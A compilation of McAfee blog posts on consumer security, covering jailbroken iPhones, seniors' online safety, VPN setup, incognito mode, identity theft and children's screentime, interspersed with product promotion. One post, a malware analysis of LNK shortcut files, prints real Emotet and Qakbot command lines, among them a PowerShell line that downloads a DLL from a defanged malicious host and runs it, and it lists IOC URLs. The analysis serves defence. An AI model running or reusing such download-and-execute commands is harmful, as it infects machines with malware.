So, you’ve jailbroken your iPhone and are out of Apple’s famously closed sandbox. While it’s not an ideal situation, it’s not the end of the world. You may need antivirus protection now. This is especially true if you frequently use public Wi-Fi.  

Here are a few potential threats that a jailbroken iPhone might face: 

• Phishing: Unfortunately, malicious websites don’t come with a fraudulent website warning. Phishing happens when a cybercriminal sends a fraudulent message aimed at getting you to reveal important data like your personal or financial information. If your iPhone is successfully phished, private data on the iCloud and your device can be compromised. 
• Ransomware: Unsecured Wi-Fi networks can expose connected devices to ransomware. This type of malware threatens users with permanently blocked access to their devices unless they pay a certain amount of money. Some ransomware programs will even try to coerce money from users by warning that private information will be published if they don’t pay a ransom. 
• Malware: The reason so many different security apps and antivirus programs exist is that malware is everywhere. It also comes in many forms! Malware is a general term used to describe any software program intended to gain unauthorized access to a computer system or device. Malware can disrupt or disable a device, network, or specific user. It can also actively leak private information and create privacy concerns. 

5 signs your iPhone has a virus

If you’re worried about the Wi-Fi you used at a coffee shop last week and are searching for the “best antivirus protection for Apple,” don’t curse that java-inspired Safari surf just yet.  

There are a few telltale signs that your iPhone or another Apple device has been infected with a virus. They include: 

• Overheating: Being out in the extreme sun or having an old battery can be culprits for overheating. But if you’re repetitively seeing that feverish red thermometer on your screen, your iPhone could be letting you know it’s infected with malicious software. 
• Unexplained data usage: If you don’t have an unlimited phone plan, you probably keep a pretty close eye on data usage. So, if you see big increases in usage that don’t match your activity, this could be a sign that your iPhone may have a virus. 
• Pop-ups: Sometimes, there’s no escaping those pesky “look at me” boxes that pop up when you’re online. But seeing many pop-ups can indicate that your Apple device is harboring unwanted guests. You can minimize pop-ups by using a virtual private network like McAfee Secure VPN. 
• Suspicious apps: Make a habit of scrolling through your list of apps from time to time. This could be a red flag if you see anything that you don’t remember downloading yourself or that didn’t come with your iPhone. 
• Quick battery drainage: If your iPhone is older or has many big apps, your battery will typically drain faster. But it could also mean an unwanted and unseen program is running in the background. 

How you can protect your iPhone

The first and best way to protect your Apple device from cybersecurity concerns is to avoid jailbreaking it. While an iPhone might be limited in what apps and themes you can enjoy, its built-in security features really can’t be beaten.  

Here are some other ways you can keep your iPhone safe from malware and viruses: 

• Keep software updated. Each new version of Apple iOS has patches for security holes discovered by Apple’s internal hackers. Be sure to keep your iPhone software up to date to make sure you’re enjoying the latest security features. You can even set up automatic software updates to make things easier. 
• Set up USB restricted mode. Protect your data from “juice jacking,” which is when someone steals your data through your phone’s USB port as it’s plugged into a public charger. Head to “Settings” and then to “Face ID and Passcode.” Enter your passcode and toggle “USB Accessories.” 
• Use a password manager. A password manager like McAfee True Key can lend several additional layers of security to Apple’s already highly encrypted operating system. Consider a password management system that can help you create strong passwords and uses biometric security features like fingerprint recognition. 
• Enable Touch ID. This may seem like an old-school feature compared to facial recognition. But having touch ID enabled can reduce the chances of someone gaining unauthorized access to your iPhone since it requires your physical presence to open it.  
• Use a VPN. If you use public Wi-Fi a lot, you risk exposing your personal information. McAfee Secure VPN uses bank-grade encryption to keep your data protected while you live your life online — no matter where you are. 
• Consider antivirus software. Antivirus software can handle many potential vulnerabilities by looking out for online threats like hackers. McAfee antivirus software offers real-time threat protection across multiple devices and can help keep your iPhone free of data breaches. 

Keep your everyday devices secure 

In this day and age, we all live on our devices. And while it’s great to have the built-in security of Apple’s iOS, why settle for just one line of defense?  

For complete protection against malicious software like viruses, malware, and more, look to McAfee Total Protection. Our all-in-one approach means you’re shielded from data breaches, have access to a secure VPN, and can receive up to $1 million in identity theft coverage. The best part is that it works for multiple devices, including Mac OS and iOS.  

Enjoy the peace of mind that comes with having McAfee in your corner.  

 

The post Does an iPhone Need Antivirus Software? appeared first on McAfee Blog.

Online Safety for Seniors – How to Keep Older Family Members Safe Online

Heard of the sandwich generation? Well, if you’ve got a tribe of kids and parents who are aging then you are a fully-fledged member! And as members of this special club, not only do we need to manage and keep our offspring in check, but we also have to reserve some energy to help our parents navigate life’s challenges which of course includes the online world. 

In the broadest sense, the sandwich generation is the ‘caught in the middle’ generation who have living parents and children to care for. More often than not, it’s people like us, smack-bang in middle age, who support both their parents and children financially, physically, and/or emotionally. And with life expectancies looking rosier than ever and many of us choosing to have careers before we become parents, it’s inevitable that us middle-aged folks are feeling a little squeezed at both ends! 

Digital Parenting Can Feel All Consuming 

Getting our head around keeping our kids safe online can feel overwhelming for many of us. Keeping up with the latest apps, games and platforms can often feel relentless and let’s not forget about trying to weave in cyber safety messages to ensure our kids make safe decisions online too. But when the downside of not being vigilant about online safety is so great, it’s essential that we extend our digital education messages to the older members of the family too! 

Over 90% of Aussie Seniors are Connected to the Internet 

One of the silver linings of the pandemic is that it gave a real push to those who were resisting getting online. And in most cases, that was the older member of our society. Research from ACMA shows that by 2020, over 90% of Australian seniors had internet connectivity in their homes compared to 68% in 2017. But as we all know, owning a car and driving it are 2 very different tasks!  

My parents, who are both in their late 70’s, do a pretty good job of managing their online lives. They bank online, are avid email senders and can even do a little Facetime, thanks to COVID! But they are a work in progress – like everyone. And while I try very hard to keep them up to date with new apps and risks, I have learnt over the years that less is more. That not overwhelming them is actually the key. In fact, the simpler I keep my updates and tips, the more likely they are to get onboard with my message.  

So, in the spirit of the experience with my much-loved mum and Dad, I‘d like to share with you the top things you can do to keep your much loved older family members safe when they go online. 

1. Invest in Protection Software 

I accept that there are no real guarantees in life but there are risk-minimizing decisions. And ensuring all devices have top-level security software is one of those. Not only will this protect your loved ones from downloading viruses and malware, but it will also allow them to shop with confidence at approved ‘safe’ websites, help them manage their passwords, locate their devices plus loads more. It’s such a small price to pay for increased peace of mind. Check out McAfee+ protection which can protect your family’s entire fleet of devices. 

2. It’s All About Passwords 

A secure password is a key to keeping one’s online life safe so taking some time to formulate a strategy for older family members is so worthwhile. Downloading a password manager was a total life changer for me. Not only did it help me create complex passwords that no human could ever generate but it remembers them for me too. I only have to remember the master password and it then automatically logs me in! Now, if this was set up carefully for older family members, this could be an amazing tool to protect their online life.  

I am also very aware that writing down passwords ‘in a special book’ is used very commonly. And if this is the only way that will work for your family members then try to make these passwords as complex as possible without overwhelming them. A complex, nonsensical sentence would work well here but just ensure each account has its own sentence in case the account gets hacked.      

3. Software Updates 

Out-of-date software is a little like leaving your front door unlocked – it makes it far easier for unwanted visitors. In almost every case, a software update includes a patch for a security vulnerability – a weak hole in the company’s software that could expose the user to risk. So, when I discovered that my parents were ignoring reminders for updates as they had become very annoying, I sprang into action! Most software updates can be automated so I strongly encourage taking some time to ensure all the software your family members use is set up to update automatically. 

4. ScamWatch 

Unfortunately, older Aussies are often the target of online scams. Scammers will work overtime to get their trust with the aim of extracting dollars or their personal details. I wish I had a silver bullet that would protect all vulnerable types from these cybercrims, but I don’t. The next best option is to talk about scams and some of the sneaky techniques scammers will use with them. I remind my parents regularly not to reply to emails from people they don’t know, not to even answer calls from numbers they aren’t familiar with and that if they receive a call from their bank and they aren’t sure whether it is legitimate, ask for the caller’s number so you can ring them bank – if the caller is legit, that won’t be a problem.  

If you think about it, keeping your older family members only is simply an extension of keeping your kids safe. The messages and strategies are almost identical! So, if your older family members use a Messenger app, why not set up a family group chat with both the younger and older family members? You can share news stories about online risks and better still, get the kids involved too! So, next time your parents have an issue with their phone – the kids will be able to help out! Awesome!! 

Take care 

Alex xx 

The post Online Safety for Seniors – How to Keep Older Family Members Safe Online appeared first on McAfee Blog.

How to Set Up a VPN

In today’s connected world, you can do so much on the internet. It’s never been easier to stay entertained (Netflix, anyone?), informed, and productive. But it’s important to keep your online activities private and safe, whether you’re checking social media, using a streaming service, or banking online.  

With the right solutions, you can have a worry-free online experience. 

Thankfully, virtual private network (VPN) software keeps your data secure by hiding your IP address (the address your device uses to access the network). In this article, discover the benefits of a VPN, learn how to set one up, and review some things to consider when looking for the right VPN solution for you. 

What is a VPN?

A virtual private network (VPN) is software that protects your internet connection by keeping your IP address secure and anonymous. Essentially, it opens a private tunnel just for you!  

It does this by making a secure connection between your internet-connected device and a remote VPN server. It also encrypts the information you upload onto the internet, preventing others from intercepting it.  

This means you can feel confident surfing the web without worrying about other people uncovering your location, identity, or online activity.  

Benefits of a VPN

A perfect digital world wouldn’t have malware, website trackers, ISP data throttling, or prying eyes. Thankfully, investing in a good VPN can help you overcome a lot of these challenges.  

Here’s a little more detail about the benefits of a VPN: 

• Stay safe by blocking malware. Depending on the type of VPN you use, it may come with a feature that blocks malware. This functionality adds another protective layer to your network, like some sort of firewall, so you don’t lose sleep over malicious software. 
• Beat the ISP throttling blues. VPNs provide a practical way to stop your internet service provider from throttling your bandwidth or data. Without throttling, you can enjoy maximum internet speeds even after you’ve reached your data or bandwidth limit. 
• Outsmart website trackers. Mobile apps and websites work tirelessly to record information about your online activity. This practice can be bothersome if you’re a stickler for privacy. A VPN keeps the trackers guessing about the nature of your information thanks to advanced encryption. 
• Protect yourself on public Wi-Fi. If you regularly connect to the internet via public Wi-Fi, it’s important to stay safe using a VPN. An unsecured public Wi-Fi network provides an easy way for criminals to steal sensitive information like your credit card number and passwords. There’s no need to worry about anyone seeing or stealing your data when you use a VPN. 

How to set up a VPN server

Investing in the right tools is a surefire way to make yourself feel less vulnerable to online risks. Rather, you’ll feel empowered to enjoy a care-free online experience.  

McAfee® Safe Connect VPN is one such tool that gives you the freedom to enjoy all the good things that the internet offers without worrying about online privacy or safety. 

This tool works on multiple platforms, including Microsoft Windows, macOS, Android, and iOS. More importantly, McAfee Safe Connect VPN is easy to set up on different devices, allowing you to benefit from bank-grade AES 256-bit encryption. So, you can browse the internet using Chrome or another browser and connect via public Wi-Fi without losing sleep over vulnerability to risks. 

Depending on your preferences, it’s possible to set up a VPN automatically or manually. We discuss the steps to set up a VPN manually in the sections below. 

Set up a VPN connection on Windows

Easy setup and connection to a VPN server are key factors when choosing the right tool or software for your needs. On a Windows 10 system, just follow a few steps to establish a secure and stable connection. 

1. Search for the virtual private network on Cortana. 
2. Then, go to the VPN settings and select the plus sign (“+”). 
3. On the drop-down menu that appears, select “Windows built-in.” (The system automatically sets the VPN type to automatic. You can change it to VPN protocols like PPTP, TCP, SSTP, L2TP/IPsec, or IKEv2.) 
4. In the next fields, add VPN configuration details from your VPN provider (in this case, McAfee Safe Connect VPN). 
5. Once you’ve completed filling in the details, click “Save” and then “Next.” 
6. In the last step, select the McAfee VPN connection, and you’re done! 

Set up a VPN connection on a Mac

The next time you need to set up a VPN on a Mac computer, you’ll be pleased to know that the setup steps are short and sweet. 

Here’s what you need to do. 

1. Start by clicking “Network” under “System Preferences.” 
2. Next, click on the “+” sign and select “VPN.” 
3. In the pop-up interface that appears, add details like connection name, server address, VPN type, server name, and authentication settings for advanced options. 
4. In the final step, click “Apply” and “OK” to finish. 

5 things to look for in a VPN

Picking the best VPN solution that takes care of your privacy needs involves ticking various boxes based on the features and functionality that matter most to you. 

Here are some things to look for in a virtual private network: 

• The number of servers: A good VPN should offer a selection of servers that can handle a lot of traffic without undermining connection speeds. 
• Robust data encryption: Converting data into a code is what makes a good VPN tick. So, opt for a VPN with the latest encryption technology, such as AES 256-bit encryption offered by McAfee SafeConnect VPN. 
• Server location: The VPN service should also offer servers located in various regions depending on your connection requirements. Nearby service can reduce lag, particularly when you want to engage in online gaming. And sometimes, you need a VPN server from another region or country to get around geo-blocking. 
• Excellent tech support: The right VPN solution should come with good technical support to help you find answers to any questions you may have. 
• Ease of use: A good VPN client should be easy to set up and use so you can focus on your online activities rather than tweaking the VPN settings. 

Can you use a VPN on mobile devices?

If you have a mobile device like an Apple iPhone or Android device, you can also enjoy the benefits that come with using a VPN.  

Setting up and using a VPN like McAfee’s Safe Connect VPN on an Android device or iOS platform is super easy. Just download the VPN from the app store or the McAfee website, and you’re good to go.  

McAfee offers both a free VPN (with 250 MB of free data every month and protection for one device) and paid subscription plans that come with unlimited data and protection for up to five devices. You can also enjoy a 30-day free trial to see if it’s the right VPN for you. 

It’s usually fine to just use the default settings, too, so you don’t have to do anything else other than login. 

Keep your browsing private

Hiding your IP address and maximizing privacy has never been easier thanks to virtual private networks. These tools can also protect you from prying eyes by converting the information you upload to the internet into code using advanced encryption technology.  

VPNs have several advantages, including getting around website trackers used by advertisers to monitor your online activities. Another thing to remember is that it’s relatively easy to set one up no matter your operating system.  

If you’re looking for the right VPN solution for you, consider McAfee Secure VPN — included in McAfee Total Protection — which comes with the latest encryption technology. Whether you install the software on your mobile or desktop device, you can be confident that you and your family’s sensitive data is secure.  

The post How to Set Up a VPN appeared first on McAfee Blog.

Rise of LNK (Shortcut files) Malware

Authored by Lakshya Mathur

An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click create shortcut option or sometimes they are created automatically while running an application. There are many tools also available to build LNK files, also many people have built “lnkbombs” tools specifically for malicious purposes.

During the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. Attackers are exploiting the ease of LNK, and are using it to deliver malware like Emotet, Qakbot, IcedID, Bazarloaders, etc.

In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.

Below is a screenshot of how these shortcut files look to a normal user.

LNK THREAT ANALYSIS & CAMPAIGNS

With Microsoft disabling office macros by default malware actors are now enhancing their lure techniques including exploiting LNK files to achieve their goals.

Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files.

We will go through three recent malware campaigns Emotet, IcedID, and Qakbot to see how dangerous these files can be.

 

EMOTET

Infection-Chain

Threat Analysis

In Figure 4 we can see the lure message and attached malicious LNK file.

The user is infected by manually accessing the attached LNK file. To dig a little deeper, we see the properties of the LNK file:

As seen in Figure 5 the target part reveals that LNK invokes the Windows Command Processor (cmd.exe). The target path as seen in the properties is only visible to 255 characters. However, command-line arguments can be up to 4096, so malicious actors can that this advantage and pass on long arguments as they will be not visible in the properties.

In our case the argument is /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

Once the findstr.exe utility receives the mentioned string, the rest of the content of the LNK file is saved in a .VBS file under the %temp% folder with the random name YIScZcZKeP.vbs

The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.

The downloaded DLL is then finally executed using the REGSVR32.EXE utility which is similar behavior to the excel(.xls) based version of the emotet.

ICEDID

Infection-Chain

Threat Analysis

This attack is a perfect example of how attackers chain LNK, PowerShell, and MSHTA utilities target their victims.

Here, PowerShell LNK has a highly obfuscated parameter which can be seen in Figure 8 target part of the LNK properties

The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time and then executes MSHTA with argument hxxps://hectorcalle[.]com/093789.hta.

The downloaded HTA file invokes another PowerShell that has a similar obfuscated parameter, but this connects to Uri hxxps://hectorcalle[.]com/listbul.exe

The Uri downloads the IcedID installer 64-bit EXE payload under the %HOME% folder.

QAKBOT

Infection-Chain

Threat Analysis

This attack will show us how attackers can directly hardcode malicious URLs to run along with utilities like PowerShell and download main threat payloads.

In Figure 10 the full target part argument is “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr”

When this PowerShell LNK is invoked, it connects to hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png using the Invoke-WebRequest command and the download file is saved under the %temp% folder with the name test.dll

This is the main Qakbot DLL payload which is then executed using the rundll32 utility.

CONCLUSION

As we saw in the above three threat campaigns, it is understood that attackers abuse the windows shortcut LNK files and made them to be extremely dangerous to the common users. LNK combined with PowerShell, CMD, MSHTA, etc., can do severe damage to the victim’s machine. Malicious LNKs are generally seen to be using PowerShell and CMD by which they can connect to malicious URLs to download malicious payloads.

We covered just three of the threat families here, but these files have been seen using other windows utilities to deliver diverse types of malicious payloads. These types of attacks are still evolving, so every user must give a thorough check while using LNK shortcut files. Consumers must keep their Operating system and Anti-Virus up to date. They should beware of phishing mail and clicking on malicious links and attachments.

IOC (Indicators of Compromise)

Type	SHA-256	Scanner
Emotet LNK	02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71	WSS	LNK/Emotet-FSE
IcedID LNK	24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9	WSS	LNK/Agent-FTA Suspicious ZIP!lnk
Qakbot LNK	b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172	WSS	LNK/Agent-TSR
URLs (Uniform Resource Locator)	hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/ hxxp://filmmogzivota[.]rs/SpryAssets/gDR/ hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/ hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/ hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1/ hxxps://hectorcalle[.]com/093789.hta hxxps://hectorcalle[.]com/listbul.exe hxxps://green-a-thon[.]com/LosZkUvr/B.png	WebAdvisor	All URLs Blocked

 

The post Rise of LNK (Shortcut files) Malware appeared first on McAfee Blog.

What Is Incognito Mode and How Safe Is It?

The internet makes it easy to get a lot done, but not all of it needs to be public. That’s where incognito mode comes in, letting you hide your search history from others who are using your internet-connected device. For example, imagine searching online for “ideas for a surprise birthday party.” You wouldn’t want the guest of honor to see that if they use your shared computer!  

What most people don’t realize, though, is that incognito mode or private browsing isn’t really private. If you want to have a private browsing session, it helps to understand what incognito mode does and doesn’t do. 

In this article, we’ll explain what incognito mode is, how to turn it on using different search engines and mobile devices, and why a VPN like McAfee Secure VPN might be a better option for safeguarding your privacy. 

What is incognito mode?

When you search the internet, your web browser automatically saves the history of your searches. In incognito mode, however, it deletes this information when you end the session.  

Google Chrome coined “incognito mode,” so the term is pretty popular. Other web browsers might refer to it differently. For example, Firefox calls it “private mode,” while Safari uses the term “private browsing.”  

What does incognito mode hide?

When you search the internet in private browsing mode, your browser won’t save the history of the websites once you close all of the incognito tabs. This deleted information might include: 

• Browsing history, which is a list of the websites you recently visited 
• Cookies, which are small files websites use to remember you and your login information 
• Site data, which is information entered on a website’s forms 

What browsing history data is visible with incognito mode?

Incognito mode can be super convenient but, as we said, it’s not really private. While it’s true that anyone using your device won’t be able to view your history, your browsing can still be viewed by outside eyes, like:  

• Internet service providers (ISP): The company that provides your internet service knows every site you’ve visited. If they receive a subpoena from law enforcement, they’ll have to turn over that data. 

• Websites: Even if you’re in incognito mode, your ISP shares your internet protocol (IP) address with the websites you visit. The IP address is a unique number that identifies an internet-enabled device. Anyone with your IP address can determine the city, or possibly the neighborhood, where you live. The only way to conceal your IP address when browsing is to use a virtual private network like McAfee Secure VPN. 
• School or company networks: If you use a network run by your school or employer, they can see your browsing history even if you’re in incognito mode. 
• Websites you log into: When you’re in incognito mode and log into a website like Twitter, you won’t be anonymous. The site can also share your data with other websites. 

How to turn on incognito mode

Every major browser and mobile device has a type of private browsing. Here’s how to access incognito mode in a few different ways. 

Private browsing in Google Chrome

It’s easy to launch a search in incognito mode in Google Chrome. Just follow these steps:  

1. Open the Chrome browser on your device. 
2. Click the three vertical dots in the upper-right corner of the window. 
3. Select “New Incognito Window.”  
4. Or use a keyboard shortcut: In Windows, Linux, or Chrome, press Ctrl + Shift + N. On a Mac, press ⌘ + Shift + N. 

You’ll know you’re in Chrome’s incognito mode by the black background and spy icon on the homepage. Here, Chrome reminds you of what incognito mode will and won’t do.  

There is also a toggle to block third-party cookies. When you visit different websites while in incognito mode, websites can track your movement. They might use that data to target ads based on your search history. When you enable third-party cookie blocking, it stops sites from sharing cookies and data. 

Private browsing on your Android device

Here’s how to set it up in the Google Chrome browser for your Android (note that the Google Chrome app is the default browser for most Android phones): 

1. Open Chrome. 
2. Tap the three dots at the top-right corner of the screen. 
3. Tap “New incognito tab.” This will open up a new incognito window. 
4. Close the incognito window to end the incognito session. 

Remember, for Google Chrome’s incognito mode to do the trick, you need to close your browsing session after each use. If you leave the tab open and someone else uses your phone, they can see your activity. 

Private browsing in Mozilla Firefox

What Chrome calls “incognito mode,” Mozilla Firefox refers to as “private browsing.” There are a couple of ways to launch a private window using the steps below: 

1. Open Mozilla on your browser. 
2. Click the three horizontal lines in the top-right corner. 
3. Select “New Private Window.” 
4. Or use the keyboard shortcut Ctrl + Shift + P in Windows. On a Mac, press Command + Shift + P. 

The private browsing window has a dark-purple background and a mask icon. This homepage also describes the limitations of private browsing. 

With its Enhanced Tracking Protection, Firefox blocks third-party tracking across sites. This is a default protection on Firefox, so cookies are blocked across sites no matter which privacy setting a user chooses. 

Private browsing in Apple Safari

Apple’s Safari was the first to introduce private browsing for Apple devices in 2005. Users have a couple of ways to open a private window on a Mac or an iOS device. They include: 

1. Go to the File menu and select “New Private Window.” 
2. The keyboard shortcut is to hold down Command + Shift + N. 
3. On an iPhone, open Safari. Tap the “Tabs” button (the two squares on the lower right). Tap “Private.” Tap “Done.” 

Your sign that you’re in a private browser window is a dark gray search bar. Like Firefox, Safari lets you block third-party tracking (you’ll just need to adjust your settings to do so). Choose Safari on your Mac. Go to “Preferences” and click “Privacy.” Then, select “Prevent cross-site tracking.” 

Private browsing on your iPhone

For iPhones, the default browser is Safari. Here’s how to set up private browsing in Safari for your iPhone: 

1. Open Safari. 
2. Tap the tab icon at the bottom right of the screen (it looks like two overlapping squares). 
3. Tap “private” at the bottom-left of the screen. 
4. To exit private mode, tap “private” again. 

Remember to close your browser’s private tabs when you’re done surfing. This makes sure that cookies are deleted and the private session is safely hidden from your device’s history. 

Why do people use incognito mode?

Doing a private search that erases your browsing history can be useful in certain situations. Because some cookies are deleted at the end of your search, you’ll see fewer ads than in a normal search.  

If there’s something you don’t want to keep in your browser history, like shopping for a gift for a relative, an incognito search can keep your activity private.  

It’s also a good idea to use incognito mode when using a public device or a borrowed computer to protect your data.  

Incognito mode is even helpful if you want to do a search that’s not influenced by your browsing history or to see your blog or website from a fresh perspective. 

Is incognito mode safe?

The terms “private search” and “incognito mode” sound great. But while your history is erased on your device, it’s still visible to the outside world. Even when you’re in incognito mode, websites, your ISP, and your network can still see your IP address and browsing history. 

Not to mention, it won’t delete any files you download, like malicious software. While someone using your device won’t be able to see your browsing history, incognito mode won’t be able to stop hackers and identity thieves in their tracks. 

If you really want to hide your computer’s IP address and browse privately while keeping your data safe, it’s a good idea to look into a VPN service, like McAfee Secure VPN. With our smart VPN, you can browse confidently and stay anonymous from advertisers and prying eyes. You’ll also benefit from bank-grade encryption and automatic protection on unsecured networks.  

Browse online confidently

If your goal is to keep prying eyes out of your browsing history, incognito browsing might not be enough. Use a McAfee Secure VPN for worry-free browsing.  

For added security, though, upgrade to McAfee Total Protection Ultimate and enjoy antivirus protection, identity monitoring, and more! 

The post What Is Incognito Mode and How Safe Is It? appeared first on McAfee Blog.

What Is Identity Theft and How Do You Recover From It?

The internet is a big place. While it’s changed the world for the better — making our daily lives that much easier! — it can also be a playground for cybercriminals who would love to get their hands on our personal information.  

When this happens, it can result in identity theft. While it can be scary to deal with, there are things you can do to protect yourself and recover from this type of cybercrime.  

In this article, we’ll tell you what identity theft is and how to recognize its various forms. We’ll also go over what you can do to bounce back after your identity has been taken.  

What is identity theft?

Life online presents so many cool opportunities, but it can also make us vulnerable to cybercriminals. But that doesn’t mean you need to get offline. A little knowledge can go a long way in keeping you safe. It all starts with understanding what identity theft is.  

Identity theft is when someone steals your personal or financial information to commit fraud or deception, typically for monetary gain. Depending on their goals, they might take a variety of information. Unfortunately, this is something most people will experience — either directly or indirectly — at some point in their lives. 

What makes identity theft really troublesome is that the consequences can go beyond just affecting your credit score. You might experience issues while trying to get jobs, see an increase in your auto insurance rate, get a surprise tax bill, and even find out you have a criminal record! Not to mention it can cost a lot of time and money to fix.  

Just as important as it is to understand what identity theft is, it’s also important to know the different types of identity theft so you can keep an eye out.  

Types of identity theft 

You work, play, and shop on the internet every day, but you shouldn’t let the fear of identity theft stop you from doing what you enjoy online. All it takes is a little information to outsmart online criminals — including knowing the different types of identity theft. They include: 

• Financial identity theft: A thief will use your identity for their own financial gain. The cybercriminal might hack your bank account to steal funds or use your credit card for online shopping. If you have a good credit history, they might even use your identity to buy a home or rent an apartment.  

• Medical identity theft: A thief will use your identity to secure medical services. With your health insurance information, they can get prescription drugs, buy medical equipment, or even pay for medical care and procedures. Whatever your insurance doesn’t pay for will then get billed to you.  

• Criminal identity theft: This happens when a thief is busted for a crime and gives the arresting officer your information. The criminal might have stolen your actual ID or created a fake one, and you won’t know what’s happened until the crime shows up on your background check (or, worse, you get a court summons in the mail).  

• Synthetic identity theft: A thief will use your identity to create a fake person. The new persona will have your birthdate, Social Security number, and address — but a different name. They can then use this persona to do things like apply for loans and get credit cards.  

• Child identity theft: A thief will use a child’s identity to commit fraud. Kids usually don’t have bank accounts or debt. The thief may use the child’s identity to do things like buy homes or get social benefits.  

How does identity theft happen?

How does an identity thief get your information? Any time you make a purchase, subscribe to a website, file a tax return, or do anything else online, you share your personal information. And some cybercriminals are pretty good at getting that information for themselves.  

Here are a few of the most common ways thieves can get access to your data:  

• Phishing scams: A thief might message you over email or social media pretending to be someone they’re not. They may claim to be calling on behalf of the Internal Revenue Service (IRS), a sweepstakes, or even a family member. After that, the criminal will ask for money or your personal information.  

• Data breach: When you fill out webforms, open new accounts, or make purchases online, your personal information is likely saved in a company database. Most companies do their best to keep your information secure, but hackers are always hard at work trying to gain access to it. If the hackers can breach your information, they can sell it for a profit.  

• Internet of Things (IoT): It’s not just computers that have internet access anymore. Hackers might also try to steal personal information from your smartphone, tablet, or another internet-compatible device. 

• Social media: People share all kinds of personal information on social media. In addition to data like your birthday, address, and phone number, criminals can learn about your family members, pets, and interests. They can use this data as potential password information when they try to break into your online accounts. 

• Physical theft: Some thieves are old-fashioned. A criminal can take your credit card, ID, smartphone, or computer and use it to steal your identity. If you throw away documents like paystubs or checks without shredding them first, criminals can use them to get your personal data, like your bank account numbers. 

What personal information is generally taken when identity theft occurs?

The type of information that hackers take during a breach can vary widely. It just depends on what information a company stores, what data the cybercriminal can access, and even the purpose of the attack. A hacker might be making a political statement or simply “showing off” their skills. 

During a breach, hackers target information that can be resold on the dark web or used for identity fraud, like debit card or credit card accounts. They might also collect data like people’s full names, email addresses, passwords, Social Security numbers, and driver’s license numbers. 

How to recover from identity theft

Dealing with identity theft can be stressful and a little bit scary, but we promise it’s not the end of the world. The important thing is to be quick about it and stay alert for signs of identity theft, like:  

• A sudden dip in your credit score  
• Mail addressed to your home with someone else’s name on it 
• Calls from debt collectors about debts that aren’t yours 
• Unexplained bills showing up at your home  

The good news is that if you’re ever the victim of identity theft, there are several things you can do to limit and reverse that damage. We’ll explore these steps in the next few sections. 

Contact the company where your information was stolen

Notify your credit card company, financial institution, or the business where the thief is using your data right away. For example, if the criminal is using your credit card number to buy clothing online, contact the store immediately. They’ll be able to stop any further purchases from being made.  

File a police report

Banks don’t like scams, either. Some banks may require you to show them a police report about your identity theft before they’ll refund any fraudulent charges or withdrawals. Call your local law enforcement office to report identity theft as soon as you can.  

Before speaking to an officer, though, take the time to go over all the information so you don’t leave anything out. Be as detailed as possible. Let the cops know how your sensitive information was used and what dates and times it was used. You may want to bring a copy of your bank statement as proof. 

Notify the three major credit bureaus 

One of the biggest pains about identity theft is that it can affect your credit score, which can affect your ability to do things like secure a business loan or buy a house. File a fraud alert with each of the three major credit bureaus — TransUnion, Equifax, and Experian — and let them know which activity on your credit report is false.  

File a report with the Federal Trade Commission

When you file a report with the Federal Trade Commission (FTC), they’ll create a free recovery plan for you to deal with your identity being stolen. The FTC is a government organization that protects the rights of consumers. You can get started by visiting IdentityTheft.gov.  

Consider investing in a comprehensive security plan

The best time to deal with identity theft is before it happens. When you sign up for all-in-one protection, like McAfee Total Protection, you’ll get $1 million of identity theft protection insurance.  

We’ll also provide identity monitoring to help catch threats to your information before they get out of hand. You’ll also get access to our Secure VPN and our quality antivirus and safe browsing software to protect you from threats like malware.  

Browse confidently with award-winning identity protection 

You deserve to live your life online and enjoy the internet the way it was meant to be. That’s where McAfee can help — making the digital world a safe place for you and your family! 

We’ve got your back when it comes to your online identity with our identity protection service. When you sign up, we’ll keep tabs on up to 60 unique types of personal data, including your financial information. We’ll also notify you up to 10 months sooner than similar services if it seems like your identity has been compromised. And on top of $1 million of ID theft coverage, you’ll receive hands-on restoration support to get your identity back.  

See how McAfee can help secure your personal information online and give you peace of mind.  What Is Identity Theft and How Do You Recover From It?

The post What Is Identity Theft and How Do You Recover From It? appeared first on McAfee Blog.

6 Tips to Help Your Balance Your Children’s Summer Screentime

The pandemic forced many parents into screentime management Bootcamp. We learned quickly that more hours at home require more intention in managing family technology. The exact purpose holds true for summer. Before things get too crazy—vacations, camps, and a revolving door of friends—a priority might be putting a screentime plan in place.  

Add to the summer equation that many parents are still on remote or hybrid work schedules, and the need for a summer screentime plan becomes even more important.

But first, what’s the cost of just winging it with screentime this summer? Doing so could harm your child both emotionally and physically. According to the American Academy of Pediatrics (AAP), children spend an average of seven hours a day on entertainment media, such as televisions, computers, phones, and other electronic devices. Now that summer is here, we can assume that number will increase.

Balancing your child’s screentime is also a safety issue. As the summer ticks on, boredom can lead to more time online, which can open the door to threats such as cyberbullying, self-esteem and body issues, risky behavior, and connecting with strangers.

Keep in mind that every family’s summer screentime balance plan will be different depending on family schedules and children’s ages. Not sure where to begin? The AAP has an excellent, customizable Media Plan that includes a Screen Time Calculator. The guide will help you design a plan based on the ages of each child in your family.  

6 Tips to Help You Balance Screentime

